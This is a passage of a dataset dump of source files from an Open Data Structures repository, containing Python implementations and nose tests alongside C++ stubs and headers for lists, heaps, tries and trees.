"text": "\r\nimport random\r\n\r\ndef exercise_sort(sort, gen=random.random):\r\n \"\"\"Run some tests on the sorting function, sort\"\"\"\r\n for n in [0, 1, 100, 1000, 10000]: \r\n a = [gen() for _ in range(n)]\r\n b = a[:]\r\n # in-place sorts return None, other sorts return sorted array\r\n c = sort(b)\r\n if c is None: c = b\r\n assert(sorted(a) == list(c))\r\n \r\n "
},
{
"alpha_fraction": 0.6855345964431763,
"alphanum_fraction": 0.6855345964431763,
"avg_line_length": 15,
"blob_id": "61144fe01f7f5fc190c6651c1f165e0799fd1c07",
"content_id": "c68cfeb870888d364745b5e3274757c564821012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 9,
"path": "/opendatastructures.org/python/ods/tests/test_dualarraydeque.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_dad():\r\n exercise_list(ods.DualArrayDeque())\r\n \r\n"
},
{
"alpha_fraction": 0.48701298236846924,
"alphanum_fraction": 0.5389610528945923,
"avg_line_length": 10.833333015441895,
"blob_id": "59d4e6435358b652c9ff3fb58395aa03997cb462",
"content_id": "59b3ecf65b6e2cd6bdb39017e9046f57d8225d03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/BinaryHeap.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinaryHeap.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"BinaryHeap.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6034912467002869,
"alphanum_fraction": 0.6234413981437683,
"avg_line_length": 18.049999237060547,
"blob_id": "48275761ef99b026bb4c4b8a7af941829ac5599d",
"content_id": "1fd063098a23307cd4e0a5bbd2f01f368cc89ac2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 20,
"path": "/opendatastructures.org/cpp/SLList.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * SLList.cpp\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#include \"SLList.h\"\r\n\r\nnamespace ods {\r\n\r\ntemplate SLList<int>::SLList();\r\ntemplate SLList<int>::~SLList();\r\ntemplate int SLList<int>::push(int x);\r\ntemplate bool SLList<int>::add(int x);\r\ntemplate int SLList<int>::remove();\r\ntemplate int SLList<int>::pop();\r\ntemplate int SLList<int>::size();\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5365853905677795,
"alphanum_fraction": 0.5756097435951233,
"avg_line_length": 11.666666984558105,
"blob_id": "d69f638d62939488367a68c51d66105f445e54cd",
"content_id": "558393f1f2483a33ef7a55b484e8fcc0f72d1bc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 15,
"path": "/opendatastructures.org/cpp/FastArrayStack.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * FastArrayStack.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n#include <string.h>\r\n#include \"FastArrayStack.h\"\r\n#include \"utils.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.702479362487793,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 14.714285850524902,
"blob_id": "bda5158d09b031a2f9a13324ad61c6ca70cebb12",
"content_id": "746a547007e9dd19f7bfc57db8727f22122293ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 121,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_binaryheap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nimport ods\r\nfrom heaptest import exercise_heap\r\n\r\ndef test_bh():\r\n\texercise_heap(ods.BinaryHeap())\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6943867206573486,
"alphanum_fraction": 0.7110186815261841,
"avg_line_length": 23.3157901763916,
"blob_id": "02ffd71b744a3e53d293d35691fe2be803b2b945",
"content_id": "da9a508c198aa970a1600a10e84923771ea66e5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 19,
"path": "/opendatastructures.org/cpp/RootishArrayStack.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * RootishArrayStack.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n\r\n#include \"RootishArrayStack.h\"\r\n\r\nnamespace ods {\r\n\r\ntemplate RootishArrayStack<int>::RootishArrayStack();\r\ntemplate RootishArrayStack<int>::~RootishArrayStack();\r\ntemplate void RootishArrayStack<int>::add(int,int);\r\ntemplate int RootishArrayStack<int>::remove(int);\r\ntemplate void RootishArrayStack<int>::grow();\r\ntemplate void RootishArrayStack<int>::shrink();\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7071428298950195,
"alphanum_fraction": 0.7071428298950195,
"avg_line_length": 20.66666603088379,
"blob_id": "00e14523bfeec3fcff26db8989c726d494c5bdb4",
"content_id": "bdcfc9ad85ea097c56670a4387dd582db77c0015",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 140,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_binarysearchtree.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\n\r\nfrom nose.tools import *\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_bst():\r\n exercise_sset(ods.BinarySearchTree())\r\n"
},
{
"alpha_fraction": 0.3954372704029083,
"alphanum_fraction": 0.43193915486335754,
"avg_line_length": 27.177778244018555,
"blob_id": "2f979118a6e3cf7ec847f5c214c7c18b7cee7496",
"content_id": "37a6206c0bbf955953c7a6b9eae1a1ed370badf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1315,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 45,
"path": "/opendatastructures.org/python/ods/tests/listtest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"For testing the functionality of list implementations\"\"\"\r\nimport random\r\n\r\nfrom nose.tools import *\r\nfrom ods import ControlList\r\n\r\ndef list_cmp(l1, l2):\r\n assert(l1 == l2)\r\n assert(list(l1) == list(l2))\r\n assert(len(l1) == len(l2))\r\n for i in range(len(l1)):\r\n assert(l1.get(i) == l2.get(i))\r\n\r\ndef exercise_list(ell=None):\r\n l1 = [ell, ControlList()][ell is None]\r\n l2 = ControlList()\r\n random.seed(5)\r\n n = 100\r\n for i in range(5):\r\n if i == 2: \r\n l1.clear()\r\n l2.clear()\r\n for _ in range(n):\r\n x = random.random();\r\n i = random.randrange(0, len(l1)+1)\r\n l1.add(i, x)\r\n l2.add(i, x)\r\n list_cmp(l1, l2)\r\n for _ in range(5*n):\r\n op = random.randrange(0,3)\r\n if (op == 0):\r\n i = random.randrange(0, len(l1)+1)\r\n x = random.random();\r\n l1.add(i, x)\r\n l2.add(i, x)\r\n elif op == 1:\r\n i = random.randrange(0, len(l1))\r\n x = random.random();\r\n l1.set(i,x)\r\n l2.set(i,x)\r\n else:\r\n i = random.randrange(0, len(l1))\r\n l1.remove(i)\r\n l2.remove(i)\r\n list_cmp(l1, l2)\r\n\r\n"
},
{
"alpha_fraction": 0.4738292098045349,
"alphanum_fraction": 0.4738292098045349,
"avg_line_length": 22.86046600341797,
"blob_id": "0fdc8bb3018329464bc81262bb5c0fc8756f3456",
"content_id": "78e3463c57ff6e2511667bb39f10ba31875e425b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1089,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 43,
"path": "/opendatastructures.org/python/ods/controlsset.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"A class that implements a stupid SSet (for testing purposes)\"\"\"\r\n\r\nimport bisect\r\n\r\nfrom base import BaseSet\r\n\r\nclass ControlSSet(BaseSet):\r\n def __init__(self, iterable=[]):\r\n self.a = []\r\n self.add_all(iterable)\r\n \r\n def add_all(self, iterable):\r\n for x in iterable:\r\n self.add(x)\r\n \r\n def add(self, x):\r\n i = bisect.bisect_left(self.a, x)\r\n if i == len(self.a) or self.a[i] != x:\r\n bisect.insort_right(self.a, x)\r\n return True\r\n return False\r\n \r\n def remove(self, x):\r\n i = bisect.bisect_left(self.a, x)\r\n if i != len(self.a) and self.a[i] == x:\r\n del self.a[i]\r\n return True\r\n return False\r\n \r\n def find(self, x):\r\n i = bisect.bisect_left(self.a, x)\r\n if i != len(self.a): \r\n return self.a[i]\r\n return None\r\n \r\n def size(self):\r\n return len(self.a)\r\n \r\n def clear(self):\r\n self.a = list()\r\n \r\n def __iter__(self):\r\n return self.a.__iter__()\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.4513888955116272,
"alphanum_fraction": 0.5069444179534912,
"avg_line_length": 10,
"blob_id": "bb8afa482e226ccdb9d1da1aa314bb155befa66a",
"content_id": "c4a8a065a943deeef5e9048a60238585fcab0938",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/array.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * array.cpp\r\n *\r\n * Created on: 2011-11-24\r\n * Author: morin\r\n */\r\n\r\n#include \"array.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5536912679672241,
"alphanum_fraction": 0.5872483253479004,
"avg_line_length": 12.190476417541504,
"blob_id": "176e267924c47ef2baaaa3d9da5646b6320df9a9",
"content_id": "e9cd4e2689048be73cfe422657e15ddf75e8c970",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 21,
"path": "/opendatastructures.org/cpp/AdjacencyLists.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * AdjacencyLists.cpp\r\n *\r\n * Created on: 2012-01-13\r\n * Author: morin\r\n */\r\n\r\n#include \"AdjacencyLists.h\"\r\n\r\nnamespace ods {\r\n\r\nAdjacencyLists::AdjacencyLists(int n0) {\r\n\tn = n0;\r\n\tadj = new List[n];\r\n}\r\n\r\nAdjacencyLists::~AdjacencyLists() {\r\n\tdelete[] adj;\r\n}\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.4513888955116272,
"alphanum_fraction": 0.5069444179534912,
"avg_line_length": 10,
"blob_id": "cf7bb7afec5ad9691eed52a1ce62ece9dfc87802",
"content_id": "f56a034851808d0742d2615ecacafc5abf47a958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/BTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BTree.cpp\r\n *\r\n * Created on: 2013-07-03\r\n * Author: morin\r\n */\r\n\r\n#include \"BTree.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5262145400047302,
"alphanum_fraction": 0.5300625562667847,
"avg_line_length": 27.98550796508789,
"blob_id": "e280f3300a59bf0ab8ae2c5442577e88cef51c17",
"content_id": "3fa23aed688ef4bc060602b7253138b6a33763d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2079,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 69,
"path": "/opendatastructures.org/python/ods/dualarraydeque.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "'''\r\nAn array-based list implementation with O(1+min{i,n-i}) amortized update time.\r\n\r\nThis running time is achieved by gluing together two ArrayStacks,\r\ncalled front and back, so that they are back to back.\r\n\r\nItems are redistributed even between front and back whenever one is more than\r\nthree times the size of the other.\r\n'''\r\n\r\nfrom arraystack import ArrayStack\r\n\r\nfrom base import BaseList\r\n\r\nclass DualArrayDeque(BaseList):\r\n def __init__(self, iterable=[]):\r\n self._initialize()\r\n self.add_all(iterable)\r\n \r\n def _initialize(self):\r\n self.front = ArrayStack()\r\n self.back = ArrayStack()\r\n \r\n def get(self, i):\r\n if i < self.front.size():\r\n return self.front.get(self.front.size()-i-1)\r\n else:\r\n return self.back.get(i-self.front.size())\r\n \r\n def set(self, i, x):\r\n if i < self.front.size():\r\n return self.front.set(self.front.size()-i-1, x)\r\n else:\r\n return self.back.set(i-self.front.size(), x)\r\n \r\n def add(self, i, x):\r\n if i < self.front.size():\r\n self.front.add(self.front.size()-i, x)\r\n else:\r\n self.back.add(i-self.front.size(), x)\r\n self._balance()\r\n\r\n def remove(self, i):\r\n if i < self.front.size():\r\n x = self.front.remove(self.front.size()-i-1)\r\n else:\r\n x = self.back.remove(i-self.front.size())\r\n self._balance()\r\n return x\r\n\r\n def _balance(self):\r\n n = self.size()\r\n mid = n//2\r\n if 3*self.front.size() < self.back.size() or 3*self.back.size() < self.front.size():\r\n f = ArrayStack()\r\n for i in range(mid):\r\n f.add(i, self.get(mid-i-1))\r\n b = ArrayStack()\r\n for i in range(n-mid):\r\n b.add(i, self.get(mid+i)) \r\n self.front = f\r\n self.back = b\r\n\r\n def clear(self):\r\n self.front.clear()\r\n self.back.clear()\r\n\r\n def size(self):\r\n return self.front.size() + self.back.size()\r\n \r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5797101259231567,
"alphanum_fraction": 0.5884057879447937,
"avg_line_length": 16.48214340209961,
"blob_id": "7fce07c345b7fb118a4824b1c2160f31bce917fa",
"content_id": "d71a18fce41dc4d37d395f86ea3b01fb29138026",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1035,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 56,
"path": "/opendatastructures.org/cpp/BlockStore.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BlockStore.h\r\n *\r\n * Created on: 2013-07-03\r\n * Author: morin\r\n */\r\n\r\n#ifndef BLOCKSTORE_H_\r\n#define BLOCKSTORE_H_\r\n\r\n#include \"ArrayStack.h\"\r\n\r\nnamespace ods {\r\n\r\n/**\r\n * This class fakes an external memory block storage system. It's just a list\r\n * of blocks.\r\n */\r\ntemplate<class T>\r\nclass BlockStore {\r\nprotected:\r\n\tArrayStack<T> blocks; // list of blocks\r\n\tArrayStack<unsigned> free; // unused block indices\r\npublic:\r\n\tBlockStore() : blocks(), free() {\t}\r\n\tvirtual void clear() {\r\n\t\tblocks.clear();\r\n\t\tfree.clear();\r\n\t}\r\n\tvirtual ~BlockStore() {\r\n\t\tclear();\r\n\t}\r\n\tvirtual int placeBlock(T block) {\r\n\t\tint i;\r\n\t\tif (free.size() > 0) {\r\n\t\t\ti = free.remove(free.size());\r\n\t\t} else {\r\n\t\t\ti = blocks.size();\r\n\t\t\tblocks.add(i, block);\r\n\t\t}\r\n\t\treturn i;\r\n\t}\r\n\tvirtual void freeBlock(int i) {\r\n\t\tblocks.set(i, NULL);\r\n\t\tfree.add(i);\r\n\t}\r\n\tvirtual T readBlock(int i) {\r\n\t\treturn blocks.get(i);\r\n\t}\r\n\tvoid writeBlock(int i, T block) {\r\n\t\tblocks.set(i, block);\r\n\t}\r\n};\r\n\r\n} /* namespace ods */\r\n#endif /* BLOCKSTORE_H_ */\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.550632894039154,
"avg_line_length": 11.166666984558105,
"blob_id": "a91234543b929e7938298f6870838823eb16a818",
"content_id": "a01f32fe1d6e5396e73b59d8eef975d4d965affd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/RedBlackTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * RedBlackTree.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"RedBlackTree.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6231405138969421,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 17.387096405029297,
"blob_id": "64617708df7b32155a7aa0b9c1134a9f7bd2009b",
"content_id": "7bb28238f59542ffe1cf697ed9e25980893ab0a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 31,
"path": "/opendatastructures.org/cpp/ArrayStack.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * ArrayStack.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n\r\n#include \"ArrayStack.h\"\r\n#include \"utils.h\"\r\n\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate ArrayStack<int>::ArrayStack();\r\ntemplate ArrayStack<int>::~ArrayStack();\r\ntemplate void ArrayStack<int>::add(int,int);\r\ntemplate int ArrayStack<int>::remove(int);\r\n\r\ntemplate ArrayStack<int*>::ArrayStack();\r\ntemplate ArrayStack<int*>::~ArrayStack();\r\ntemplate void ArrayStack<int*>::add(int,int*);\r\ntemplate int* ArrayStack<int*>::remove(int);\r\n\r\n\r\n//void pfft() {\r\n//\tArrayStack<int> asi;\r\n//\tasi.size();\r\n//}\r\n\r\n} /* namespace ods */\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6850000023841858,
"alphanum_fraction": 0.7110000252723694,
"avg_line_length": 23.64102554321289,
"blob_id": "d76ea88fbb228a05fe634306e9cb312efd04e889",
"content_id": "dc34dd77343f1f0d0ca68fc1432e665e277ae00c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1000,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 39,
"path": "/opendatastructures.org/cpp/BinarySearchTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinarySearchTree.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"BinarySearchTree.h\"\r\n#include \"utils.h\"\r\nnamespace ods {\r\n\r\n/**\r\n * Todo: Do this for other classes and/or move this up into BinarySearchTree<Node,T>\r\n */\r\ntemplate<>\r\nBinarySearchTree1<int>::BinarySearchTree1() : BinarySearchTree<BSTNode1<int>, int>(INT_MIN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<long>::BinarySearchTree1() : BinarySearchTree<BSTNode1<long>, long>(LONG_MIN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<long long>::BinarySearchTree1() : BinarySearchTree<BSTNode1<long long>, long long>(LLONG_MIN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<double>::BinarySearchTree1() : BinarySearchTree<BSTNode1<double>, double>(NAN) {\r\n}\r\n\r\ntemplate<>\r\nBinarySearchTree1<float>::BinarySearchTree1() : BinarySearchTree<BSTNode1<float>, float>(NAN) {\r\n}\r\n\r\ntemplate class BinarySearchTree1<int>;\r\ntemplate class BinarySearchTree1<double>;\r\n// template class BinarySearchTree1<dodo>;\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.52073734998703,
"alphanum_fraction": 0.557603657245636,
"avg_line_length": 11.5625,
"blob_id": "580fe393cfd0c52712ce14fc3ab1a7655e6fa027",
"content_id": "6e7549a7928d6a2ee867a7525bcb62df95f4f08b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 16,
"path": "/opendatastructures.org/cpp/DLList.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * DLList.cpp\r\n *\r\n * Created on: 2011-11-24\r\n * Author: morin\r\n */\r\n\r\n#include \"DLList.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate DLList<int>::DLList();\r\ntemplate DLList<int>::~DLList();\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.4740259647369385,
"alphanum_fraction": 0.5259740352630615,
"avg_line_length": 9.84615421295166,
"blob_id": "4485ae93b32b8e53e7aeb16f830a75567314eb93",
"content_id": "91850bf33e7835d4847235a418ae5c205bc867f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/XFastTrie.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * XFastTrie.cpp\r\n *\r\n * Created on: 2012-01-26\r\n * Author: morin\r\n */\r\n\r\n#include \"XFastTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7196261882781982,
"alphanum_fraction": 0.7196261882781982,
"avg_line_length": 19.399999618530273,
"blob_id": "7ed069de61837be6b058cff500c3d5fd1ac252e0",
"content_id": "5974077c5f1ed4f90aa53ddee147060a6ed7e3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/opendatastructures.org/python/ods/tests/test_chainedhashtable.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from settest import exercise_set\r\nimport ods\r\n\r\ndef test_cht():\r\n exercise_set(ods.ChainedHashTable())\r\n"
},
{
"alpha_fraction": 0.707317054271698,
"alphanum_fraction": 0.707317054271698,
"avg_line_length": 15,
"blob_id": "bc44a29668f44186d1227f963546d9712748b926",
"content_id": "8e3d057aeb2c019d3fe09bbba4351758177c333a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_meldableheap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nimport ods\r\nfrom heaptest import exercise_heap\r\n\r\ndef test_mh():\r\n\texercise_heap(ods.MeldableHeap())\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.8167575001716614,
"alphanum_fraction": 0.8167575001716614,
"avg_line_length": 26.705883026123047,
"blob_id": "2a72d6b8a2c1d7ef091d63b768a3b33bb69c5c23",
"content_id": "dde5526fa9082f6910f0ffa30493514eee4fe667",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1468,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 51,
"path": "/opendatastructures.org/python/ods/__init__.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "# Array-based lists\r\nfrom arraydeque import ArrayDeque\r\nfrom arrayqueue import ArrayQueue\r\nfrom arraystack import ArrayStack\r\nfrom fastarraystack import FastArrayStack\r\nfrom dualarraydeque import DualArrayDeque\r\nfrom rootisharraystack import RootishArrayStack\r\n\r\n# Linked lists\r\nfrom sllist import SLList\r\nfrom dllist import DLList\r\nfrom selist import SEList\r\nfrom skiplistlist import SkiplistList\r\n\r\n# Hash tables\r\nfrom chainedhashtable import ChainedHashTable\r\nfrom linearhashtable import LinearHashTable\r\n\r\n# Binary tree\r\nfrom binarytree import BinaryTree\r\n\r\n# Comparison-based SSets\r\nfrom skiplistsset import SkiplistSSet\r\nfrom binarysearchtree import BinarySearchTree\r\nfrom redblacktree import RedBlackTree\r\nfrom scapegoattree import ScapegoatTree\r\nfrom treap import Treap\r\n\r\n# Priority queues\r\nfrom binaryheap import BinaryHeap\r\nfrom meldableheap import MeldableHeap\r\n\r\n# Dumb as a bag of hammers data structures used for testing\r\nfrom controllist import ControlList\r\nfrom controlsset import ControlSSet\r\n\r\n# Sorting algorithms\r\nfrom algorithms import merge_sort, quick_sort, heap_sort, \\\r\n counting_sort, radix_sort\r\n\r\n# Graphs\r\nfrom adjacencymatrix import AdjacencyMatrix\r\nfrom adjacencylists import AdjacencyLists\r\n\r\n# Integer data structures\r\nfrom binarytrie import BinaryTrie\r\nfrom xfasttrie import XFastTrie\r\nfrom yfasttrie import YFastTrie\r\n\r\n# External memory data structures\r\nfrom btree import BTree, BlockStore # fixme, don't need blockstore\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5548450350761414,
"alphanum_fraction": 0.5725528597831726,
"avg_line_length": 16.824073791503906,
"blob_id": "1d38df2cf9e82b0413044d369bd9d4c7923f0f3a",
"content_id": "7c1945fa9bbe5a0246579275d563e7d3dffcda0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2033,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 108,
"path": "/opendatastructures.org/cpp/YFastTrie.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * YFastTrie.h\r\n *\r\n * Created on: 2012-01-27\r\n * Author: morin\r\n */\r\n\r\n#ifndef YFASTTRIE_H_\r\n#define YFASTTRIE_H_\r\n\r\n#include \"Treap.h\"\r\n#include \"XFastTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n/**\r\n * Warning YFastTrie depends on XFastTrie, so you can't use it to store\r\n * the values UINT_MAX-1 or UINT_MAX-2\r\n */\r\ntemplate<class T>\r\nclass YPair {\r\npublic:\r\n\tunsigned ix;\r\n\tTreap1<T> *t;\r\n\tYPair(unsigned ix0, Treap1<T> *t0) { ix = ix0; t = t0; }\r\n\tYPair(unsigned ix0) { ix = ix0; }\r\n\tYPair() { }\r\n};\r\n\r\n\r\ntemplate<class T>\r\nunsigned intValue(const YPair<T> &p) {\r\n\treturn p.ix;\r\n}\r\n\r\n\r\ntemplate<class T>\r\nclass YFastTrie {\r\n\tstatic const int w = 32; // FIXME portability\r\n\tXFastTrie1<YPair<T> > xft;\r\n\tint n;\r\npublic:\r\n\tYFastTrie();\r\n\tvirtual ~YFastTrie();\r\n\tT find(T x);\r\n\tbool add(T x);\r\n\tbool remove(T x);\r\n\tint size() { return n; }\r\n\tvoid clear() {} ;\r\n};\r\n\r\ntemplate<class T>\r\nYFastTrie<T>::YFastTrie() : xft() {\r\n\txft.add(YPair<T>(UINT_MAX, new Treap1<T>()));\r\n\tn = 0;\r\n}\r\n\r\ntemplate<class T>\r\nYFastTrie<T>::~YFastTrie() {\r\n/* FIXME: Need to iterate over the YFastTrie elements\r\n\tXFastTrieNode1<YPair<T> > *u = xft.dummy.next;\r\n\twhile (u != &xft.dummy) {\r\n\t\tdelete u->x.t;\r\n\t\tu = u->next;\r\n\t}\r\n*/\r\n\txft.clear();\r\n\tn = 0;\r\n}\r\n\r\ntemplate<class T>\r\nT YFastTrie<T>::find(T x) {\r\n\treturn xft.find(YPair<T>(intValue(x))).t->find(x);\r\n}\r\n\r\ntemplate<class T>\r\nbool YFastTrie<T>::add(T x) {\r\n\tunsigned ix = intValue(x);\r\n\tTreap1<T> *t = xft.find(YPair<T>(ix)).t;\r\n\tif (t->add(x)) {\r\n\t\tn++;\r\n\t\tif (rand() % w == 0) {\r\n\t\t\tTreap1<T> *t1 = (Treap1<T>*)t->split(x);\r\n\t\t\txft.add(YPair<T>(ix, t1));\r\n\t\t}\r\n\t\treturn true;\r\n\t}\r\n\treturn false;\r\n\treturn true;\r\n}\r\n\r\ntemplate<class T>\r\nbool YFastTrie<T>::remove(T x) {\r\n\tunsigned ix = intValue(x);\r\n\tXFastTrieNode1<YPair<T> > *u = xft.findNode(ix);\r\n\tbool ret = u->x.t->remove(x);\r\n\tif (ret) n--;\r\n\tif (u->x.ix == ix && ix != UINT_MAX) {\r\n\t\tTreap1<T> *t2 = u->child[1]->x.t;\r\n\t\tt2->absorb(*u->x.t);\r\n\t\txft.remove(u->x);\r\n\t}\r\n\treturn ret;\r\n}\r\n\r\n} /* namespace ods */\r\n#endif /* YFASTTRIE_H_ */\r\n"
},
{
"alpha_fraction": 0.3621252477169037,
"alphanum_fraction": 0.3885425925254822,
"avg_line_length": 20.51677894592285,
"blob_id": "c27992b7eb5895c0075cb2e6efc8a66844d5399e",
"content_id": "956af0e3897c25c8806baabe19fb3d18d344710f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3369,
